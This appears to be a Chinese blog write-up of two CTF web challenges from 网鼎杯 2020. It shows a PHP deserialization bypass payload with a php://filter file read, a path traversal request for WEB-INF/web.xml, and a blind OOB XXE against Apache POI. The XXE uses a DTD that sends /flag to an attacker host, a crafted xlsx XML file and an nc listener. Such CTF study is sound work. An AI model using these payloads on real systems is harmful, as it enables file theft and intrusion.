Life has its own fate, and meeting may not be accidental.

0%

网鼎杯2020青龙组-web

看来反序列化要多打点了,反序列化这块都不怎么熟~

AreUSerialz

源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
<?php
include("flag.php");
highlight_file(__FILE__);
class FileHandler {

protected $op;
protected $filename;
protected $content;

function __construct() {
$op = "1";
$filename = "/tmp/tmpfile";
$content = "Hello World!";
$this->process();
}

public function process() {
if($this->op == "1") {
$this->write();
} else if($this->op == "2") {
$res = $this->read();
$this->output($res);
} else {
$this->output("Bad Hacker!");
}
}

private function write() {
if(isset($this->filename) && isset($this->content)) {
if(strlen((string)$this->content) > 100) {
$this->output("Too long!");
die();
}
$res = file_put_contents($this->filename, $this->content);
if($res) $this->output("Successful!");
else $this->output("Failed!");
} else {
$this->output("Failed!");
}
}

private function read() {
$res = "";
if(isset($this->filename)) {
$res = file_get_contents($this->filename);
}
return $res;
}

private function output($s) {
echo "[Result]: <br>";
echo $s;
}

function __destruct() {
if($this->op === "2")
$this->op = "1";
$this->content = "";
$this->process();
}

}

function is_valid($s) {
for($i = 0; $i < strlen($s); $i++)
if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
return false;
return true;
}

if(isset($_GET{'str'})) {

$str = (string)$_GET['str'];
if(is_valid($str)) {
$obj = unserialize($str);
}

}

考点:
  序列化后产生不可见字符

private、protected序列化后产生不可见字符

1
2
private属性序列化的时候格式是 %00类名%00成员名
protected属性序列化的时候格式是 %00*%00成员名

__destruct()

__destruct()这个魔术方法在每次销毁一个对象时触发。
而 PHP 的特性 「 运行完一次请求则销毁环境 」 的做法。反正执行完请求后所有该销毁的都会销毁。
但是我们要把op == 2才能进入read利用

绕过

PHP7.1以上的反序列化不会判断里面参数的属性类型了,所以可以改成public再进行反序列化,绕过private、protected序列化后产生不可见字符。__destruct()方法,当op===”2”时会将”2”变成”1”,可以把op转成int型进行绕过~

读取

因为默认路径改了个名~
先读取一下index.php
serialize

1
O:11:"FileHandler":3:{s:2:"op";i:2;s:8:"filename";s:58:"php://filter/read=convert.base64-encode/resource=index.php";s:7:"content";N;}

可以看到成功读取了
但是读不到flag.php~~
linux提供了/proc/self/目录,这个目录比较独特,不同的进程访问该目录时获得的信息是不同的,内容等价于/proc/本进程pid/。进程可以通过访问/proc/self/目录来获取自己的信息。

下面内容来自imagin

1
2
3
4
5
6
1. maps 记录一些调用的扩展或者自定义 so 文件
2. environ 环境变量
3. comm 当前进程运行的程序
4. cmdline 程序运行的绝对路径
5. cpuset docker 环境可以看 machine ID
6. cgroup docker环境下全是 machine ID 不太常用

利用/proc/self/cmdline找到当前运行程序的路径,
然后找到当前的网站根目录配置文件。
不过好像相对路径也可以~

filejava

一开始还以为是java上传题,后来下载时候发现可能是目录穿越。

可以看到路径,看看WEB-INF下面的web.xml试试

1
filename=../../../../../../../../../../../../usr/local/tomcat/webapps/ROOT/WEB-INF/web.xml

比赛的时候和buu的路径不太一样。


一共三个文件,在UploadServlet.class文件中存在上传poi-ooxml-3.10 has something wrong这样的输出,发现3.10有一个漏洞

Apache POI 3.10-FINAL及以前版本被发现允许远程攻击者通过注入XML外部实体访问外部实体资源或者读取任意文件。

构造Blind OOB XXE

上传引入我们的vps里的dtd的一个xml的外部实体攻击

上传的文件满足两个条件:

  1. excel-开头
  2. xlsx结尾

我在BUU上复现的,BUU靶机只能内网访问。所以需要用小号开一个Basic里面的linux靶机

在/var/www/html/下构建一个1.dtd

1
2
<!ENTITY % file SYSTEM "file:///flag">
<!ENTITY % int "<!ENTITY &#37; send SYSTEM 'http://ip:2333?%file;'>">

先创建一个xlsx文件,然后改后缀为zip修改里面的[Content_Types].xml文件。(先把该文件单独解压出来,修改完后再压进去)

1
2
3
4
5
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE convert [
<!ENTITY % remote SYSTEM "http://ip/1.dtd">
%remote;%int;%send;
]>

再将文件后缀改为xlsx文件

监控我们linux靶机的2333端口(记得进去/var/www/html):

1
nc -lvvp 2333

然后上传我们的xlsx文件就行了

就可以看到靶机上的注入结果了

notes

CVE-2019-10795 undefsafe原型链污染
最近在研究jsouyp搞爬虫,准备开发个阅读器自用= =,最后一题等我有时间在做好了,node这方面也不怎么熟,希望后面用vue开发完后能很快理解~


参考

PHP反序列化从初级到高级利用篇
proc/self/目录的意义
网鼎杯-web
Apache POI XML外部实体(XML External Entity,XXE)攻击详解